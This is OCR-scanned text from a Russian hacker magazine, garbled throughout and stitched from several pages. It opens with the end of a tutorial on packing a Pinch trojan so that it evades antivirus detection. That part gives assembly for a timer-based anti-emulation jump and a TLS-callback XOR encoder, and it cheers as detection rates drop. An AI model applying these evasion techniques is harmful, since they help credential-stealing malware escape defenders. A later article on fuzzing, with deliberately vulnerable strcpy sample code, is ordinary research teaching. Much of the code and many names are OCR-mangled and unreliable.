

Жесопб; 


// 


Секунды 


ЖЕБ 


члМИИзесопбз ; 


// 


Миллисекунды 



} ЗУ8ТЕМТІМЕ; 

Условимся, что для хранения двух структур, полученных в резуль- 
тате пары вызовов ОеНосаІТіппе, будем использовать области 
памяти, начинающиеся, соответственно, с адресов 13147070 
и 13147094. Функция 51еер(), входящая в Кегпе132, инициирует 
«заморозку» выполнения программы, принимая параметр, выра- 
женный в миллисекундах, через стек. Используя эти условия, напи- 
шем следующий КОД: 

13147СЕА РБЗН кас!аЪга_. 13147Б7Б; записываем в стек 
первый адрес 

13147СЕЕ САЬЬ кегпе132 . СеБЬосаІТіте ; получаем первый 
временной штамп 

13147Б04 РБЗН ЗЕ8; задержка таймера — 1000 миллисе- 
кунд, или 1 секунда 

13147Б09 САЬЬ кегпе132 . Зіеер; запуск таймера 
13147Б0Е РІІЗН кас!аЪга_. 13147Б94 ; записываем в стек 
второй адрес 

13147Б13 САЬЬ кегпе132 . СекЬосаІТіше ; получаем второй 
временной штамп 

В результате выполнения получаем две 16-байтных заполненных 
структуры, каждая из которых записана, начиная с адреса, опреде- 
ленного нами выше: 

[год] [месяц] [день недели] [День месяца] [Часы] 

[Минуты] [Секунды] [Миллисекунды] 

13147Б7Б: БА 07 0А 00 02 00 ОС 00 ОБ 00 ОС 00 31 00 
В1 03 

13 147Б94 : БА 07 0А 00 02 00 ОС 00 ОБ 00 ОБ 00 04 00 
В1 03 

Обрати внимание: нас интересуют только значения, соответствую- 



щие секундам. Мы заставили программу «спать» ровно 1 секунду, а 
это значит, что разница между двойными словами, записанными в 
ячейках [13147676+0] и [131 47094+0] , не должна быть больше или 
меньше единицы (в абсолютном большинстве случаев). Этот факт 
должен помочь нам побороть эмуляторы кода, пропускающие тай- 
меры. Но как использовать полученное значение? Мы посчитаем 
разницу и используем ее для вычисления адреса перехода. Если 
эта разница будет посчитана неверно (что означает, что код эму- 
лируется, причем неверно), то выполнение программы полетит ко 
всем чертям, но это нас не волнует :). Итак, получим приблизитель- 
но следующий КОД: 

13147СЕ9 ; Код получения временных штампов (приведен 
выше ) 

13 147Б18 МОѴ АЬ , ВУТЕ РТВ БЗ : [ 13 147Б89 ] ; первое значе- 
ние помещаем в АЬ 

13 147БІБ МОѴ АН, ВУТЕ РТК БЗ : [ 13 147ВА0 ] ; второе значе- 
ние помещаем в АН 

13147Б23 ЗБВ АН,АБ; получаем разность значений 
13147Б25 ХОК ЕВХ,ЕВХ; обнуляем ЕВХ 
13147Б27 МОѴ ВЬ,АН; перемещаем разность в ЕВХ 
13147Б29 АВВ ЕВХ , 13 147С2 9 ; вычисляем адрес перехода 
13147В2Е БМР ЕВХ; переходим по вычисленному адресу 

Наверное, ты уже догадался, что адрес, который помещается в 
ЕВХ, должен быть равен 13147С30. Однако, как показывает прак- 
тика, не все идеально, особенно если речь идет об эмуляции кода. 
Благодаря несложным манипуляциям мы получаем великолепный 
результат: эмуляция Ог. ѴѴеЬ разваливается на глазах! :). Вместе 
с ним отступают и еще два антивиря — это не может не радовать 
нашу душу. Всего 22 из 43 антивирусов продолжают подозревать 
нашу программу в чем-то нехорошем. 

Последние штрихи 

Когда я писал статью, я заметил, что в веб-интерфейс пинча стали 
приходить странные однообразные отчеты. Сначала мне показа- 
лось, что эти отчеты присланы с виртуальной машины, созданной 
мной, но потом понял, что это не так: все они были созданы на 
машинах с различной конфигурацией. В конце концов я понял, 
что это — результат запусков на машинах экспертов, которые 
пользуются ѵігизІоІаГом для анализа новых угроз. Мои опасения 
подтвердились, когда я увидел, что количество антивирусов, рас- 
познавших в зашифрованном мной файле угрозу, увеличилось, хотя 
и ненамного. Тогда я решил «обернуть» вокруг защиты, созданной 
мной, еще один «слой»-пакер, запускаемый из ТІ_5. Для чего? Это 
позволит усложнить жизнь механизмам, использующим сигнатуры. 
Кроме того, на месте ТБЭ-функции может быть любой алгоритм, 
кодирующий произвольный участок файла, что позволяет малыми 
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25% антивирусов сдались сразу же после внедрения криптора 



усилиями полностью изменить содержание файла, скрыв «узнавае- 
мые» места. Мало того, использование саІІЬаск-функций само по 
себе является достаточно неплохим средством усложнения защит- 
ного механизма. 

Думаю, что ты читал о ИЗ (ТЬгеаб І_осаІ 5іогаде)-саЦЬаск-функциях 
достаточно (в частности, Крис посвятил ИЗ отдельную статью, 
опубликованную в одном из номеров нашего журнала), однако 
напомню о том, что они собой представляют, опуская описа- 
ние широчайших возможностей их использования. СаІІЬаск- 
функции выполняются непосредственно после инициализации 
программы загрузчиком, еще до остановки на ОЕР. Информация 
обо всех таких функциях содержится в специальной таблице, 
а адрес таблицы, в свою очередь, извлекается загрузчиком из 
специального поля РЕ-заголовка. 

Попробуем создать таблицу ТІ_5-функций для нашей программы 
(к написанию кода саІІЬаск-функции приступим чуть позже). 
Структура ее, имеющая размер шестнадцати байт, проста. 
Первые два двойных слова используются для записи адресов 
начала и конца выделяемой для потока области данных. В 
качестве этих значений мы выберем два произвольных адреса 
(13147680 и 13147690), лежащих в пределах области выравни- 
вания секции .Іехі, оставленной компилятором. Оставшиеся 
два ОѴѴОРО’а — это, соответственно, поле для записи индекса, 
возвращаемого саІІЬаск-функцией (13147696), и адрес таблицы 
саІІЬаск-функций (131 476а0) . 

Так выглядит код получившейся ТЬЗ-таблицы: 80 76 14 13 90 76 
14 13 96 76 14 13 а0 76 14 13. Разместим его по адресу 13147656 
при помощи отладчика (запомним адрес — он нам еще понадо- 
бится). 

Приступим к созданию кода таблицы ТІ_5-функций. 

Переходим к адресу 131 476а0, выделяем 6 байт, выбираем из 
контекстного меню команду «Віпагу -> Ебіі». Вводим значе- 
ние «13 14 76 Ь0 00 00». Первые 4 байта указывают на адрес 
саІІЬаск-функции. Последние два нулевых байта указывают на 
окончание таблицы саІІЬаск-функций. 

По адресу 131 476 Ь0 разместим саму функцию, шифрующую все 
наши ранее созданные крипторы, а также код по второму кругу: 



13147БВ0 РБЗНАБ ; сохраняем регистры в стек 
13147БВ1 МОѴ ЕСХ , 6Б2Е ; устанавливаем счетчик 
13147БВ6 МОѴ БН , ВУТЕ РТК БЗ : [ ЕСХ+ 13 1 4 1 0 0 0 ] ; помещаем 
в БН текущий байт секции 

13147БВС ХОК БН , СБ ; выполняем логическое сложение с 
младшим байтом счетчика 

13 147БВЕ МОѴ ВУТЕ РТК БЗ : [ЕСХ+13 141 0 0 0 ] , БН; помеща- 
ем закодированный байт в память 

13 147БС4 БООРБ ЗНОКТ 13147БВ6; повторяем цикл 
13147БС6 РОРАБ; восстанавливаем регистры 
1314 7БС7 КЕТКГ; возвращаемся из функции 

Полагаю, ты помнишь, что после внесения кода в файл необ- 
ходимо выполнить его, чтобы он закодировал инструкции, 
после чего следует сохранить измененный файл прямо из-под 
ОИуйЬд. 

Последний штрих — внесение сведений о ТІ_5-директории в 
РЕ-заголовок. Открываем ЬогбРЕ и правим в таблице дирек- 
торий значение ТІ_5 Аббгезз на 00005676 (разумеется, это же 
можно сделать и средствами ОИуОЬд). Кстати, если ты хочешь 
отлаживать ТІ_8, чтобы не «пролетать» мимо выполнения 
саІІЬаск-функций, нажми в ОИуОЬд АН+О и, в появившемся 
меню выбора места, где отладчик будет останавливаться при 
загрузке программы, укажи «Зузіепп Вгеакроіпі» (цель этого 
действия ясна, ведь ТІ_5 саІІЬаск’и выполняются еще до попа- 
дания на точку входа!). 

Проверим закодированный файл на ѵігизіоіаі.сопп. Нас ждет 
радостное известие — всего лишь 18 из 43 антивирусов рас- 
познают вредоносный код! Итак, на момент тестирования «сда- 
лись» такие маститые охотники за червями и малварью, как 
ОгѴѴеЬ, Рапба, N0032, ТгепбМісго-НоизеСаІЦ ѴВА32, ѴіРоЬоІ, 
ѴігизВизІег, ЗипЬеІП 7048, Е-5есиге, ВіЮебепбег, еЗаІю и многие 
другие. 

Я специально не стал доводить нашу криптовку до победного 
конца. Придумывай новые методы обмана, внедряй в наш обра- 
зец и таким образом обманывай новые антивирусы. Удачи в 
благих делах! □с 
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Х-Іе$ 1 іпд С0ПІѲ2І 



© Наступило время подведения итогов конкурса по тестированию офис- 
ного пакета ІВМ І_оШ$ ЗутрИопу 3. Напомним, мы разыгрывали поездку 
в США на конференцию І_оіизрІіеге, которая состоится в январе 201 1 года 




Первое место в нашем конкурсе занял Леонид «сг @ ѵѵіег» 
Исупов — он зафиксировал более 10 разнообразных 
багов в І_оіиз ЗуплрПопу и заслуженно выиграл поездку 
на І_оіизрІпеге-201 1 . Второе место и поощрительный приз 
завоевал Петр «іепіІвО» Логинов. 



Реклама 







■ ■ Алексей Синцов (йідііаі Зесигііу, сіоокіеОіпЬох.ги) 

Александр Бажанюк (СІ55 РезеагсИ Теат) 

Никита Тараканов (СІ55 РезеагсИ Теат, іѵѵіМег.сот/Міагакапоѵ) 




ПРОДВИНУТЫЙ ФАЗЗИНГ 

Хитрые трюки поиска уязвимостей 

• Мы уже много говорили о том, как написать эксплойт, обойти разные 
технологии от МісгозоН, которые мешают нам эксплуатировать ту или 
иную дыру. Но сегодня мы будем говорить про то, как искать эти самые 
дыры. На страницах журнала ты уже не раз встречал термин «фаззинг». 
Кроме того, мы неоднократно раскрывали суть и значение этой техники. 
Сегодня мы рассмотрим более прогрессивные виды фаззинга... 

(структура файла, сетевой протокол на транспортном уровне), но 
содержат «случайные значения». Например, нам известно, что в 
какой-то части формата данных идет длина, под которую выделено 
два байта, а затем содержимое указанной длины: 



I 0004 | 61626364 | 

+ + + 

I "аЬсс!" 



Зная этот формат, можно сгенерировать множество вариантов: 



ІРРРРІ 61626364. . . 



ГІІ22 те ЬаЬу опе тоге Типе! 

В 138 выпуске нашего любимого журнала (август 2010 года) 5іер 
написал статью про фаззинг и ПО, с помощью которого можно 
этот самый фаззинг осуществлять. Напомню, что этим модным 
термином принято называть метод тестирования ПО, при котором 
входные данные (данные могут быть в файле, в сетевом пакете) 
формируются специально-случайным образом, то есть, фактически, 
стресс-тест. Если в результате обработки таких данных произо- 
шла ошибка, и процесс аварийно завершил свою работу, то можно 
говорить о том, что процесс фаззинга нашел «что-то». Дальше это 
«что-то» анализирует человек и делает вывод о том, что найденное 
состояние процесса при данном наборе входных данных можно 
использовать со злым умыслом, то есть исполнить произвольный 
код. Сами данные могут генерироваться по известному формату, то 
есть если нам известна спецификация формата, мы можем заранее 
подготовить кучу входных данных, которые соответствуют формату 
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Іп Метогу Риггіпд. Список функций 
в ЮА 




Іп Метогу Рікгіпд. Находим из всех 
функций нужные... 




Іп Метогу Рікгіпд. Результат фаз- 
зинга — зГаск оѵегйоѵѵ 



I " аЬссі . 



+ + + 

I 0004 | 25ХХ25ХХІ 



I "аЬссі” 



ІРР00 I 61626364 | 

+ + + 

I " аЬссі" 



+ + + 

I 0000 I I 



I " " I 



Последняя мутация по тем же причинам вызовет переполнение 
буфера в стеке (ОхРРОО - «-256» или «65280» без знака), если после 
этого будут еще какие-либо данные достаточной длины. 



И, возможно, программа, обрабатывающая эти данные, упадет 
при обработке первого набора... Дальнейший анализ покажет, что 
причина падения кроется из-за целочисленного переполнения 
(ОхРРРР это у нас «-1») с последующим переполнением буфера в 
стеке с помощью функции тетсру, что является настоящей уязви- 
мостью, а не просто досадной ошибкой. 

сЬаг Ьиііег [ 32 000 ] ; 

зЪогЦ іпР 1 епдШі=деЦЬеп ( Іііепаше , оІІзеС) ; // 

1 епдЦЬ =-1 ~ ОхРРРР 

і 1 ( ІепдЫкЗ 2 000 ) { 

// - 1<32 000 

сЬаг* р = деЦРоіпЦег( 1 і 1 епаше,о 11 зеЦ + 4 ); 
шешсру (Ьиііег , р , ІепдЦЦ) ; // 1 епдЦЬ ==65535 

} 

еізе 

ЕхсерСіопВоР ( ІепдРЪ.) ; 

Если формат неизвестен или слишком сложен (или просто лень), то 
можно использовать мутационные алгоритмы для изменения суще- 
ствующих правильных наборов данных. На том же примере: 



I 0004 | 61626364 | 



аЬссі" 



Мутирует В: 



I 0000 I 61626364 | 

+ + + 

I " аЬссі" 



I 00РР I 61626364 | 



ГІІ сгазИ уои! 

Ясно, что эффективность фаззинга напрямую зависит от слож- 
ности формата входных данных и многообразия подготовленных 
сэмплов. Если мы говорим об известном формате, то исследо- 
ватель подготавливает описание этого формата (что может быть 
очень трудоемко), по которому могут генерироваться данные. 
Далее, чем больше вариантов будет создано, тем больше веро- 
ятность, что мы что-то найдем. В случае, если мы используем 
мутирующие алгоритмы, важно иметь большое количество 
«образцов», которые мы будем мутировать и «подсовывать» 
исследуемому процессу. Очевидно, что мутация — более «деше- 
вое» средство, а генерация — более «полное». У обоих под- 
ходов есть свои преимущества и недостатки и, очевидно, что 
можно как-то усилить эффект (скорость и/или полноту) фаззинга, 
тем самым повысив показатели падений процесса. Из коли- 
чества «падений» затем выбираются уникальные, то есть если 
при трех наборах данных процесс упал по одной и той же «при- 
чине», это считается одним уникальным падением. Чем больше 
число уникальных падений, тем эффективнее фаззер. 

Моге ргой!.. 

Как известно, все в этом мире прогрессирует, включая и фаззинг. 
Казалось бы, простая технология, но исследователи хотят найти 
большее количество уникальных и эксплуатируемых состояний про- 
цесса, поэтому они придумывают новые финтифлюшки и алгорит- 
мы. Так, уже в 2006 году Шаун Эмблитон (ЗЬаѵѵп ЕтЫеІоп), Шерри 
Спаркс (ЗЬеггі Зрагкз) и Райн Каннингхэм (Руап Сиппіпдбат) 
задались вопросами увеличения производительности. Они спра- 
ведливо отметили преимущества фаззинга, но и показали его 
недостатки (отсутствие метрик, неопределенное время фаззинга и 
т.п.) и разработали свой проект, который уже фаззил с умом. Строил 
граф (бинарным анализом), от функции получения входных данных, 
до, например, опасной АРІ (зігсру) и генерировал новые входные 
данные, смотря при этом, как обходится граф и идет ли он до цели. 
Задача — откинуть заранее тупиковые наборы данных, которые 
не приведут к нужному пути. При этом используется генетический 
алгоритм для генерации новых сэмплов (учитываются предыду- 
щие пробеги и их результат). Так или иначе, ребята, родившие эти 
идеи и реализовавшие свой проект, уже работают в АНБ :). Более 
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взлом 




Пирамида фаззинга 



подробно с их идеями можешь ознакомиться на ЫаскбаТсот/ 
ргезепІаІіопз/ЬЬ- иза-06/В Н- 115-06- ЕтЬІеІоп.рсІб 

Іп-Метогу Риніпд 

Вернемся к ситуации, когда входной формат разбирать очень лень. 
Как проводить фаззинг без знания формата и без игры в мутацию 
существующих данных? Ответ оказался прост — фаззить прямо в 
процессе. То есть, программа — это набор функций, при получении 
выходных данных эти функции вызываются, так или иначе обра- 
батывая входные данные, поэтому можно организовать вызов этих 
функций напрямую с заранее сгенерированными данными. Таким 
образом можно сэкономить время на разборе формата и подготовке 
данных согласно этому формату. Кроме того, это может повысить и 
скорость самого процесса поиска дыр; так, например, мы обходим 
ограничения, которые могут быть в программе (например, при сете- 
вом фаззинге мы ограничены скоростью обработки подключения, 
количеству одновременно разрешенных соединений и т.д.). А если 
будем перебирать данные уже в самом процессе, обойдя ассері, 
гесѵ, то сможем сразу фаззить нужные нам функции. Поможет нам в 
этом релиз от СогеІапЗесигіІу Теат, который можно скачать отсюда 

— гес!тіпе.согеІап.Ье:8800/рго)ес1:5/іп тепло гѵіиггіпд/біез . На самом 
деле этого недостаточно, еще нужны Русіазт ( іЬегпіпд.огд/тадпиз/ 
агсбіѵез/278 ) и Раітеі [ орепгсе.огд/сі оѵѵпІоасІ5/сІе1:аіІ5/208/РаіМеі ). 
Естественно, нужен интерпретатор Питона и Іттипііу ОеЬидег 
( беЬиддег.іттипіІѵіпс.сот/гедізІег.ЬітІ ). Кстати, с дистрибом 
дебагера идет и Питон, так что качать интерпретатор отдельно не 
надо) с плагином рѵебпбасісіг.ру ( гес!тіпе.согеІап.Ье:8800/рго)ес1:5/ 
рѵебпсіасісіг ]. Как ты уже понял, все будет не так просто, все это 
шаманство еще надо собрать в следующей последовательности: 

1. Ставим Иммунити Дебагер с Питоном; 

2 . Качаем рѵебпбасісіг, кидаем в папку РуСотппапсІ в (директории 
дебагера); 

3. Качаем и инсталим русіазт для Питона 2.5; 

4 . Качаем ПайМэй, распаковываем, идем в папку іпзіаііегз, запу- 
скаем установщик; 

5 . Удаляем из папки питона ПейМеевский русіазт — РуіЬоп25\І_іЬ\ 
зі!;е- раскадез\русІ ЬдХрусІазт . русі . 

Теперь РуБЬд готов к работе с Питоном 2.5. После этого можно про- 
бовать что-нибудь фаззить. Но для начала надо понять, что именно, 
а точнее, какие функции процесса работают непосредственно с 
данными. Напишем простую программку, которая берет из файла 
параметры через символ-разделитель и копирует в память. 
Программа будет брать три параметра, каждый из которых обраба- 
тывается отдельной функцией. Уязвимость будет во второй функции 

— переполнение буфера. 

ѵоісі іипсі (сііаг* іприЬ) 

{ 

сЬаг Ьиііег[ 255 ]; 

ипзідпесі іпЬ 1 еп=зЕг 1 еп ( іприЕ ) ; 

ІІ ( 1 еп< 255 ) зЬгсру (Ьиііег , іприЬ) ; 



іриЬз ( "ЕШС1 : сіопе ! \п" , зСсІоиЦ) ; 

} 

ѵоісі іипс2 (сЬаг* іприЬ) 

{ 

сЬаг Ьиііег [255] ; 

зЬгсру (Ьиііег , іприЬ) ; 

іриЬз ( " РШС2 : сіопе ! \п" , зСсІоиЦ) ; 

} 

ѵоісі. іипсЗ (сЬаг* іприЬ) 

{ 

сЦаг Ьиііег [255] ; 

зЬгпсру (Ьиііег,іприЦ,254) ; 

іриЬз ( "ЕШСЗ : сіопе ! \п" , зСсІоиЦ) ; 

} 

Понятно, что уязвимость можно найти просто обыкновенным файл- 
фаззингом, но представим себе, что первоначально файл сжат 
или зашифрован, тогда так просто и быстро подсунуть данные в 
файл не получится. Тогда-то нам и поможет работа прямо в памяти. 
Подготовим входные параметры в файле іприі.іхі: би пс1;іоп_1 Типе 
Ііоп_1 ТипсІіоп_3. Наша уязвимая программа (ѵиіп.ехе) обработает 
входные данные и скажет, что все ОК. Начнем искать ошибку в 
программе с помощью фаззинга. Первым делом получим список 
функций модуля. Это может сделать рѵебпбабг. Аттачимся дебагером 
к процессу, выбираем наш плагин и задаем «Іипсііопз -о -т ѵиіп. 
ехе». После этого в папке дебагера появится файл Іипсііопз.іхі:. В 
этом файле будет полный список адресов функций нашей програм- 
мы. Берем этот файлик и копируем рядом с Тгасе.ру. Делаем деаттач 
дебагером, после чего запускаем Тгасе.ру, который спросит, к чему 
нам присосаться, и какие данные мы ждем. Ищем в списке наш 
ѵиіп.ехе и выбираем его номер. В качестве данных — «Іипс». После 
этого повторяем чтение файла в приложении. Трейсер отловит те 
функции из Іипсііопз.іхі, которые в качестве параметров обрабаты- 
вают «1ипсІіоп_». Кроме того, он запомнит и точку выхода (НЕТ), а 
также сдвиг в стеке до параметра (запомни, что первый параметр, 
как правило — Е5Р+4, второй, если есть — Е5Р+8). Сохранит он 
все это в текстовых файлах пеѵѵ_би псбіопз_асІсІ Г5.бхб (адреса входа- 
выхода) и бІоѵѵ_Іод .бхб (адрес функции и оффсет до параметра). 

После этого по СТРІ_+С выходим из трейсера, и можно начинать 
фаззить :). Прежде всего выберем из 11о\л/_1од.1х1 функции, которые 
будем фаззить (ищем Е8Р+4 на данные), найдем их точки входа/ 
выхода в пе\л/_1 : ипсІіоп5_аббг5.1хІ и создадим файлик Ьгеакроіпіз.іхі, 
где укажем интересующие нас функции. Формат файла получается 
таким: 

0x00401000 0x0040106с! ЕЗР+4 
0x00401070 0х004010с7 ЕЗР+4 
0x004010(10 0x00401125 ЕЗР+4 

Запускаем фаззер ІпМетогуЕиггег.ру и опять повторяем аттач к 
ѵиіп.ехе. Выполнив еще несколько раз чтение входных данных, 
фаззер каждый раз, как встретит функцию из списка, начнет прямо 
в памяти менять входной параметр и смотреть, дошла ли она до 
точки выхода (адреса возврата) или свалилась в исключительную 
ситуацию (падение). В случае падения создается папка «сгазЬЬіп» 
куда скидывается инфа о падении. В итоге прогона видим, что 
мы перезаписали адрес возврата во второй функции (см. скрин- 
шоты и видео на диске). Конечно, данный экземпляр фаззера 
(ІпМетогуЕигг) несовершенен, но это лишь начало — в любом 
случае ресерчер делает фаззер для себя сам, используя существую- 
щие проекты и наработки в соответствии с задачами, которые он 
решает... Так, например, рѵебіпсіасісіг находит далеко не все функции, 
поэтому лучше юзать для этого дела ЮА. Приятно, что фаззер может 
делать выводы об ошибке — на скриншоте видно, что во второй 
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функции (00401070) происходит падение при записи в стек. На глаз 
видно, что это реализация зігсру — побайтовое копирование строки, 
пока не встретится нулевой байт. Падение произошло, когда был 
достигнут конец стека. В этом случае управление перейдет на обра- 
ботчик в исключительной ситуации (фаззер отметил, что дескриптор 
захвачен нами, так как сравнил значение указателя с данными, 
которыми он подменял параметр уязвимой функции). Кстати, таким 
образом мы обойдем и защиту от переполнения буфера (ѵиіп.ехе 
скомпилирован с флагом /65), ведь зесигііу соокіе проверяется 
непосредственно перед выходом из функции, а мы перехватили 
управление задолго до этого, в процессе копирования строки. 

Статистика сэмплов 
при фаззинге: 

Для сложного формата файла: 

• мутирующим фаззером — из 3*1 0 Л 6 получается 5*1 0 Л 3 падений, 
из них 1-3 эксплуатируемые; 

• описывающим протокол — из 1*1 0 Л 6 получается 15*1 0 Л 3 паде- 
ний, из них 6-10 эксплуатируемые; 

Для простых форматов файлов: 

• мутирующим фаззером — из 1*1 0 Л 5 получается 150 падений, из 
них 0-3 эксплуатируемые; 

• описывающим протокол — из 1*1 0 Л 4 получается 150 падений, из 
них 0-1 эксплуатируемые. 

Если построить пирамиду усложнения фаззеров, то выглядеть она 
будет примерно так: 

Пример простого фаззинга можно найти на ЬирУ/зіІез.доодІе.сот/ 
зіІеЛеІіреапсІгезтапгапо . Там продемонстрировано, как с помощью 
очень простых мутирующих фаззеров добиться очень хороших 
результатов. 

Теперь рассмотрим виды фаззеров, с помощью которых можно 
добиться практического успеха. Начнем со «стариков». 

БиІІеу и реасН. 

Это очень мощные фаззеры с возможностью описывать протокол 
для фаззинга. Например, для фаззинга РТР нужен конфиг в 329 
строчек, из которых большая часть — описание самого протоко- 
ла. Для более сложных протоколов конфиг будет огромным, и его 
составление будет очень трудоемким. Очень актуальное решение 
предлагает проект Н 0 К 1122 ( ЬоЬигг.аиед.сот ). 

Схема его работы на первый взгляд громоздкая, но на самом деле 
очень простая. Но 1 Ти 22 основан на реасЬ и является его оберткой. 
Устанавливается без проблем — все модули идут в одном пакете. 
Его главная особенность состоит в том, что описание протокола, 
который нужно фаззить, делается не вручную, составляя конфи- 
гурационный файл, а с использованием специальной библиотеки 
Іт_ехрог1:, основанной на ІзЬагк (одной из составляющих частей 
сниффера ѵѵігезЬагк). Эта библиотека, используя дамп трафика, 
формирует дерево — структуру, описывающую протокол. И нам 
необходимо лишь выбрать поля, которые мы хотим фаззить, и... все! 
Это существенно упрощает работу — не нужно тратить много вре- 
мени на составление конфигурационного файла, как это делалось 
при эксплуатации реасЬ (демонстрационное видео смотри на ОѴО). 

Важно помнить! 

Для анализа падений приложения можно использовать разные 
средства. Чтобы автоматизировать этот процесс, я, например, 
использую ѵѵіпаррсІЬд. 

Пример запуска на скрине ниже. 

Я написал простой скрипт, который дергает тестированное при- 
ложение в среде ѵѵіпаррсІЬд и в автоматическом режиме может 
определить эксплуатируемость уязвимости. 

Самые умные: аѵаІапсЬе и Нее 

Рассмотрим аѵаІапсЬе ( ЫірУ/сосІе.доодІе.сопп/р/аѵаІапсЬе/ ): 

Схема его работы изображена в начале статьи. 
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Схема работы ЬоЙигг 

АѵаІапсЬе может анализировать только клиентские приложения 
(для случая чтения из сокетов). И приложения, читающие из фай- 
лов. Поддержка анализа серверных приложений будет добавлена в 
следующих версиях, но пока до этого достаточно далеко. АѵаІапсЬе 
должен быть установлен и запускаться из той же директории, что 
и 5Ір и ѵаідгіпсі (и немаловажный нюанс — должны собираться все 
вместе). Команды сборки следующие: 

$ ѵ^деС ЬШЦр :/ /аѵаІапсЬе . доодіесосіе . сош/^ііез/ 

аѵаІапсЬе- 0 . 2 . Саг . дг 

$ Саг -хѵі аѵа1апсЬе-0 . 2 . Саг . дг 

$ ссі аѵа1апсЬе-0 . 2 

$ соп:Еідиге --рге:Еіх= ч рѵ\хГ /іпзк 

$ таке 

$ таке іпзкаіі 
И запуска: 

$ . /іпзк/Ьіп/аѵаІапсЬе --:Еі1епате=затр1ез/зітр1е/зеес1 
--сІеЪид затр1ез/зітр1е/затр1е2 затріез/зітріе/зеесі 

Сначала должны быть все опции для АѵаІапсЬе, а анализируемое 
Почему аѵаІапсЬе стоит у верхушки пирамиды? Рассмотрим немно- 
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Запуск \л/іпаррсІЬд 



го теории об аѵаіапсбе и динамическом анализе в целом, после 
чего ты все сам поймешь. 

Итак, в недавнее время были предложены различные способы, 
позволяющие использовать динамический анализ для одновре- 
менного нахождения ошибок и входных данных, позволяющих их 
воспроизводить. Суть этих методов сводится примерно к следую- 
щей схеме: вводится понятие символических или помеченных 
(іаіпіеб) данных — данных, полученных программой из внешнего 
источника (стандартный поток ввода, файлы, переменные окруже- 
ния и т.д.), тем или иным способом собирается информация обо 
всех использованиях помеченных данных в программе. Эта инфор- 
мация записывается в виде булевых ограничений на значения 
помеченных данных (в эти ограничения может попадать информа- 
ция о переходах, зависящих от помеченных данных, и информация 
об использованных помеченных данных в потенциально опасных 
местах программы). Нахождение значений помеченных данных, 
делающих эти ограничения выполнимыми, может означать либо 
возможность возникновения ошибки в программе, либо возмож- 
ность обхода иных, отличных от обойденных во время первого 
запуска, частей программы. Аѵаіапсбе реализует подобный подход 
на основе открытого фреймворка для динамической интерпретации 
Ѵаідгіпб и инструмента для проверки выполнимости ограничений 
(зоіѵе г/решатель) 5ТР. Инструмент Аѵаіапсбе состоит из четырех 
основных компонент: двух модулей расширения (плагинов) Ѵаідгіпб 
— Тгаседгіпб и Соѵдгіпб, инструмента проверки выполнимости 
ограничений 5ТР и управляющего модуля. Тгаседгіпб динамически 
отслеживает поток помеченных данных в анализируемой програм- 
ме и собирает условия для обхода ее не пройденных частей и для 
срабатывания опасных операций. Эти условия при помощи управ- 
ляющего модуля передаются 5ТР для исследования их выполни- 
мости. Если какое-то из условий выполнимо, то 5ТР определяет те 
значения всех входящих в условия переменных (в том числе и зна- 
чения байтов входного файла), которые обращают условие в истину. 
В случае выполнимости условий для срабатывания опасных операций, 
программа запускается управляющим модулем повторно с соответству- 
ющим входным файлом для подтверждения найденной ошибки. 
Выполнимые условия для обхода не пройденных частей программы 
определяют набор возможных входных файлов для новых запусков 
программы. Таким образом, после каждого запуска программы 
инструментом 5ТР автоматически генерируется множество входных 
файлов для последующих запусков анализа. Далее встает задача 
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• «СегІіЛсаІіоп ргодгатз ^ог зесиге іп^огтаііоп 

Ноѵѵ» — Оогоібу Е. Оеппіпд апб Реіег 3. Оеппіпд. 1977 — 
Соттипісаііоп о! іЬе АСМ. 

• «А Іаиісе тосіеі ^ог зесиге іп^огтаііоп Ноѵѵ» — ОогоіЬу Е. 
Оеппіпд — 1976 — Соттипісаііоп о[ іЬе АСМ. 

• «Оуіап: А депегіс сіупатіс Іаіпі апаіузіз ^гатеѵѵогк» — 

^тез Сіаизе, ѴѴапсЬип І_і, апб Аіеззапбго Огзо. беогдіа 
Іпзіііиіе оі" Тесбпоіоду. 

• «Ііпсіегзіапсііпд сіаіа ІіЫіте ѵіа ѵѵЬоІе зузіет етиіаііоп» — 

Лт СЬоѵѵ, Та I Ѳагбпкеі, Кеѵі СЬгізІорбег, Мепбеі РозепЫит — 
ІІ5ЕЫІХ — ЭіапЬгб Ііпіѵегзііу. 

• « І_І РТ : А І_оѵѵ-0ѵегЬеас1 Ргасіісаі Іп^огплаііоп Ріоѵѵ Тгаскіпд 
5уз*ет ^ог Оеіесііпд Зесигііу Аиаскз» — Еепд 0іп2 Но-зеор 
Кіт, Уиапуиап гбои, Уо и Те п д ѴѴи - Ііпіѵегзііу оі 1 ІИіпоіз аі 
ІІгЬапа-СЬатраідп. 

• ѵѵіпаррбЬд.зоигсеІ'огде.пеі/ТооІз.ЫппІ . 

• ѵѵѵѵѵѵТиггіпд.огд . 



выбора из этого множества наиболее «интересных» входных дан- 
ных, то есть в первую очередь должны обрабатываться входные 
данные, на которых наиболее вероятно возникновение ошибки. Для 
решения этой задачи используется эвристическая метрика — коли- 
чество ранее не обойденных базовых блоков в программе (базовый 
блок здесь понимается в том смысле, как его определяет фрейм- 
ворк Ѵаідгіпб). Для измерения значения эвристики используется 
компонент Соѵдгіпб, в функции которого входит также фиксация 
возможных ошибок выполнения. Соѵдгіпб — гораздо более легко- 
весный модуль, нежели Тгаседгіпб, поэтому возможно сравнительно 
быстрое измерение значений эвристики для всех полученных ранее 
входных файлов и выбор входного файла с наибольшим значением. 
Из всего вышесказанного можно сделать вывод: Аѵаіапсбе — пер- 
спективный проект, который реализует обход графа выполняемой 
программы, что есть достаточно новый подход в анализе качества 
ПО. Также в этом проекте говорится про тентирование (іаіпіеб 
апаІузіз[2-5]), что, на мой взгляд, является революционным под- 
ходом в данном направлении, и в последнее время очень много 
внимания уделяется именно этому вопросу. 

Немного про 5ТР 

У 5ТР и у всех Ьііѵесіог’ных решателей (да и вообще у всех реша- 
телей) есть ряд недостатков. Ну, хотя бы то, что они все не под- 
держивают циклы (Іоор). Сейчас много работ, посвященных как раз 
разработке теории и реализации алгебраической формы, которая 
может быть использована решателем для представления цикла 
(Іоор) в САП (сопігоі біоѵѵ дгарЫ. Вот ссылки на последние достиже- 
ния в этой области: 

• 

• известные работы ЬССр : / /гезеагсЬ . тісгозоІіЦ . сот/ 

еп-из/ит/реор 1 е/ 5 шпіЦд/риЬз/ѵтсаі 09 сопз .рсЕЕ ; 

• СГГ011Р5 . сзаіі .тіЦ . еби/раа/риЬз/аппобаЦіоп-зЦибѵ- 

^зе2 002 -аЬзбгасЦ . Ынпі . 

Немного десерта 

Аѵаіапсбе — это не единственный проект, который реализует про- 
